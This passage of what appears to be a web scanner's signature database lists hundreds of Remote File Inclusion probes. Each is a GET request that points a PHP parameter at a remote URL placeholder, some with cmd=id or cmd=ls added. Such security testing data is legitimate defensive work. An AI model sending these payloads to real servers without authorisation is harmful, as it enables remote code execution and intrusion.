"004973","https://gist.github.com/mubix/5d269c686584875015a2","c","/includes/bbcb_mg.php?phpbb_root_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004974","https://gist.github.com/mubix/5d269c686584875015a2","c","/includes/begin.inc.php?PagePrefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004975","https://gist.github.com/mubix/5d269c686584875015a2","c","/includes/blogger.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004976","https://gist.github.com/mubix/5d269c686584875015a2","c","/includes/class/class_tpl.php?cache_file=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004977","https://gist.github.com/mubix/5d269c686584875015a2","c","/includes/class_template.php?quezza_root_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004978","https://gist.github.com/mubix/5d269c686584875015a2","c","/includes/classes/pctemplate.php?pcConfig[smartyPath]=@RFIURL?cmd","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004979","https://gist.github.com/mubix/5d269c686584875015a2","c","/includes/common.inc.php?CONFIG[BASE_PATH]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004980","https://gist.github.com/mubix/5d269c686584875015a2","c","/includes/common.php?module_root_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004981","https://gist.github.com/mubix/5d269c686584875015a2","c","/includes/common.php?root=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004982","https://gist.github.com/mubix/5d269c686584875015a2","c","/includes/common.php?root=@RFIURL??","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004983","https://gist.github.com/mubix/5d269c686584875015a2","c","/includes/common.php?root_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004984","https://gist.github.com/mubix/5d269c686584875015a2","c","/includes/common.php?root_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004985","https://gist.github.com/mubix/5d269c686584875015a2","c","/includes/config.inc.php?racineTBS=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004986","https://gist.github.com/mubix/5d269c686584875015a2","c","/includes/config/master.inc.php?fm_data[root]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004987","https://gist.github.com/mubix/5d269c686584875015a2","c","/includes/config/master.inc.php?fm_data[root]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004988","https://gist.github.com/mubix/5d269c686584875015a2","c","/includes/connection.inc.php?PagePrefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004989","https://gist.github.com/mubix/5d269c686584875015a2","c","/includes/dbal.php?eqdkp_root_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004990","https://gist.github.com/mubix/5d269c686584875015a2","c","/includes/events.inc.php?PagePrefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004991","https://gist.github.com/mubix/5d269c686584875015a2","c","/includes/footer.html.inc.php?tc_config[app_root]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004992","https://gist.github.com/mubix/5d269c686584875015a2","c","/includes/footer.inc.php?PagePrefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004993","https://gist.github.com/mubix/5d269c686584875015a2","c","/includes/footer.php?PHPGREETZ_INCLUDE_DIR=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004994","https://gist.github.com/mubix/5d269c686584875015a2","c","/includes/functions.inc.php?sitepath=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004995","https://gist.github.com/mubix/5d269c686584875015a2","c","/includes/functions.php?location=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004996","https://gist.github.com/mubix/5d269c686584875015a2","c","/includes/functions.php?phpbb_root_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004997","https://gist.github.com/mubix/5d269c686584875015a2","c","/includes/functions.php?phpbb_root_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004998","https://gist.github.com/mubix/5d269c686584875015a2","c","/includes/functions/auto_email_notify.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004999","https://gist.github.com/mubix/5d269c686584875015a2","c","/includes/functions/html_generate.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005000","https://gist.github.com/mubix/5d269c686584875015a2","c","/includes/functions/master.inc.php?fm_data[root]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005001","https://gist.github.com/mubix/5d269c686584875015a2","c","/includes/functions/master.inc.php?fm_data[root]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005002","https://gist.github.com/mubix/5d269c686584875015a2","c","/includes/functions/validations.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005003","https://gist.github.com/mubix/5d269c686584875015a2","c","/includes/functions_admin.php?phpbb_root_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005004","https://gist.github.com/mubix/5d269c686584875015a2","c","/includes/functions_install.php?vwar_root=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005005","https://gist.github.com/mubix/5d269c686584875015a2","c","/includes/functions_kb.php?phpbb_root_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005006","https://gist.github.com/mubix/5d269c686584875015a2","c","/includes/functions_kb.php?phpbb_root_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005007","https://gist.github.com/mubix/5d269c686584875015a2","c","/includes/functions_mod_user.php?phpbb_root_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005008","https://gist.github.com/mubix/5d269c686584875015a2","c","/includes/functions_portal.php?phpbb_root_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005009","https://gist.github.com/mubix/5d269c686584875015a2","c","/includes/functions_portal.php?phpbb_root_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005010","https://gist.github.com/mubix/5d269c686584875015a2","c","/includes/functions_user_viewed_posts.php?phpbb_root_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005011","https://gist.github.com/mubix/5d269c686584875015a2","c","/includes/global.php?nbs=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005012","https://gist.github.com/mubix/5d269c686584875015a2","c","/includes/header.inc.php?PagePrefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005013","https://gist.github.com/mubix/5d269c686584875015a2","c","/includes/header.inc.php?dateiPfad=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005014","https://gist.github.com/mubix/5d269c686584875015a2","c","/includes/include_once.php?include_file=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005015","https://gist.github.com/mubix/5d269c686584875015a2","c","/includes/init.php?includepath=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005016","https://gist.github.com/mubix/5d269c686584875015a2","c","/includes/iplogger.php?phpbb_root_path=@RFIURL?ls","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005017","https://gist.github.com/mubix/5d269c686584875015a2","c","/includes/kb_constants.php?module_root_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005018","https://gist.github.com/mubix/5d269c686584875015a2","c","/includes/kb_constants.php?module_root_path=@RFIURL?cmd=ls","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005019","https://gist.github.com/mubix/5d269c686584875015a2","c","/includes/lang/language.php?path_to_root=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005020","https://gist.github.com/mubix/5d269c686584875015a2","c","/includes/lib-account.inc.php?CONF_CONFIG_PATH=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005021","https://gist.github.com/mubix/5d269c686584875015a2","c","/includes/lib-group.inc.php?CONF_CONFIG_PATH=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005022","https://gist.github.com/mubix/5d269c686584875015a2","c","/includes/lib-log.inc.php?CONF_CONFIG_PATH=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005023","https://gist.github.com/mubix/5d269c686584875015a2","c","/includes/lib-mydb.inc.php?CONF_CONFIG_PATH=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005024","https://gist.github.com/mubix/5d269c686584875015a2","c","/includes/lib-template-mod.inc.php?CONF_CONFIG_PATH=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005025","https://gist.github.com/mubix/5d269c686584875015a2","c","/includes/lib-themes.inc.php?CONF_CONFIG_PATH=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005026","https://gist.github.com/mubix/5d269c686584875015a2","c","/includes/logger_engine.php?phpbb_root_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005027","https://gist.github.com/mubix/5d269c686584875015a2","c","/includes/menuleft.inc.php?PagePrefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005028","https://gist.github.com/mubix/5d269c686584875015a2","c","/includes/mkb.php?phpbb_root_path=@RFIURL?ls","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005029","https://gist.github.com/mubix/5d269c686584875015a2","c","/includes/morcegoCMS/adodb/adodb.inc.php?path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005030","https://gist.github.com/mubix/5d269c686584875015a2","c","/includes/morcegoCMS/morcegoCMS.php?fichero=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005031","https://gist.github.com/mubix/5d269c686584875015a2","c","/includes/mx_common.php?module_root_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005032","https://gist.github.com/mubix/5d269c686584875015a2","c","/includes/openid/Auth/OpenID/BBStore.php?openid_root_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005033","https://gist.github.com/mubix/5d269c686584875015a2","c","/includes/orderSuccess.inc.php?&glob=1&cart_order_id=1&glob[rootDir]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005034","https://gist.github.com/mubix/5d269c686584875015a2","c","/includes/pafiledb_constants.php?module_root_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005035","https://gist.github.com/mubix/5d269c686584875015a2","c","/includes/pages.inc.php?PagePrefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005036","https://gist.github.com/mubix/5d269c686584875015a2","c","/includes/phpdig/includes/config.php?relative_script_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005037","https://gist.github.com/mubix/5d269c686584875015a2","c","/includes/profilcp_constants.php?module_root_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005038","https://gist.github.com/mubix/5d269c686584875015a2","c","/includes/settings.inc.php?approot=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005039","https://gist.github.com/mubix/5d269c686584875015a2","c","/includes/template.php?myevent_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005040","https://gist.github.com/mubix/5d269c686584875015a2","c","/includes/themen_portal_mitte.php?phpbb_root_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005041","https://gist.github.com/mubix/5d269c686584875015a2","c","/includes/tumbnail.php?config[root_ordner]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005042","https://gist.github.com/mubix/5d269c686584875015a2","c","/includes/usercp_register.php?phpbb_root_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005043","https://gist.github.com/mubix/5d269c686584875015a2","c","/includes/usercp_viewprofile.php?phpbb_root_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005044","https://gist.github.com/mubix/5d269c686584875015a2","c","/includes/xhtml.php?d_root=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005045","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php3?Application_Root=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005046","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?1=lol&PAGES[lol]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005047","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?AML_opensite=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005048","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?AMV_openconfig=1&AMV_serverpath=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005049","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?CONFIG[MWCHAT_Libs]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005050","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?ConfigDir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005051","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?DIR_PLUGINS=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005052","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?G_JGALL[inc_path]=@RFIURL%00","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005053","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?HomeDir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005054","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?Lang=AR&Page=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005055","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?Madoa=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005056","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?RP_PATH=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005057","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005058","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005059","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?abg_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005060","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?abs_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005061","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?abs_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005062","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?adduser=true&lang=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005063","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?adodb=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005064","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?ads_file=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005065","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?arquivo=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005066","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?back=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005067","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?base==@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005068","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?basePath=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005069","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?bibtexrootrel=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005070","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?blog_dc_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005071","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?blog_theme=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005072","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?body=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005073","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?class_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005074","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?classified_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005075","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?cms=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005076","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?config[\"sipssys\"]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005077","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?config[root_ordner]=@RFIURL?&cmd=id","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005078","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?config[root_ordner]=@RFIURL?cmd=id","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005079","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?config_atkroot=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005080","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?configuration=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005081","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?custom_admin_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005082","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?dateiPfad=@RFIURL?&cmd=ls","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005083","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?de=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005084","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?dept=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005085","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?do=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005086","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?exec=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005087","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?ext=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005088","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?faq_path=@RFIURL?&cmd=id","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005089","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?file_name[]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005090","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?file_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005091","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?fileloc=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005092","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?from=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005093","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?func=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005094","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?function=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005095","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?function=custom&custom=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005096","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?gOo=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005097","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?gen=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005098","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?get=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005099","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?home_name=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005100","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?ilang=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005101","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?inc_dir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005102","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?inc_dir=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005103","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?includeDir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005104","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?includeFooter=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005105","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?includesdir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005106","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?insPath=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005107","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?lang=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005108","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?language=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005109","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?language=en&main_page=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005110","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?lizge=@RFIURL?&cmd=ls","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005111","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?lng=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005112","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?load=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005113","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?loadpage=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005114","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?main_tabid=1&main_content=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005115","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?may=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005116","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?middle=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005117","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?mode=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005118","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?mode=@RFIURL?&cmd=","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005119","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?modpath=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005120","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?module=PostWrap&page=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005121","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005122","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?news7[\"functions\"]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005123","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?news_include_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005124","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?open=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005125","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?option=com_custompages&cpage=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005126","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?page=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005127","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?page=@RFIURL%00","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005128","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?page=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005129","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?page@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005130","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?page[path]=@RFIURL?&cmd=ls","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005131","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?pagename=@RFIURL","GET","PHP 